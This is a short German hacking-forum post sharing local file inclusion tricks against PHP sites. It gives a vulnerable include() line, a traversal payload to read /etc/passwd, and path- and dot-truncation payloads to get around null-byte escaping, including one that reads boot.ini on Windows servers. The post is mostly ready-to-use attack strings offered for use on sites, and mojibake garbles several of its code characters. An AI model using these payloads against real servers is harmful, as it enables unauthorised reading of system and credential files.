Keine Antworten in diesem Thema

[XoiL]

Hallo...
Ich share hier aus gegebenen Anlass mal etwas, wo ich bei denke das es dem einen oder anderen nützen kann.

Manchmal kommt man einfach nicht weiter bei einer LFI. Wenn Magic_quotes_gpc enabled sind kann man folgendes versuchen.

Normale LFI:
www.site.com/index?page=../../../../../../../../../etc/passwd%00

Dazu:
<?php include(?€™inc/?€™.$_GET['page'].?€™php?€™); ?>


Jedoch wird &00 zu /0 konvertiert und man sieht folgendes:
Warning: include(/../../../../../etc/passwd\0 [function.include]: failed to open stream: No such file or directory in /home/user/public_html/index.php


1-Path Truncation:


?page=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ ?€¦


?page=../../../../../../../../../etc/passwd./././././././././././?€¦

2-Dot Truncation:
Diese Methode funktioniert ausschlie??lich auf Windows Server (is klar). Wenn man also eine gro??e Anzahl an Punkten anfügt, wird kein Nullbyte benötigt.


page=../../../../../boot.ini?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦

Posted by Dr.Zydz DHHC!
Nicht von mir!

Lg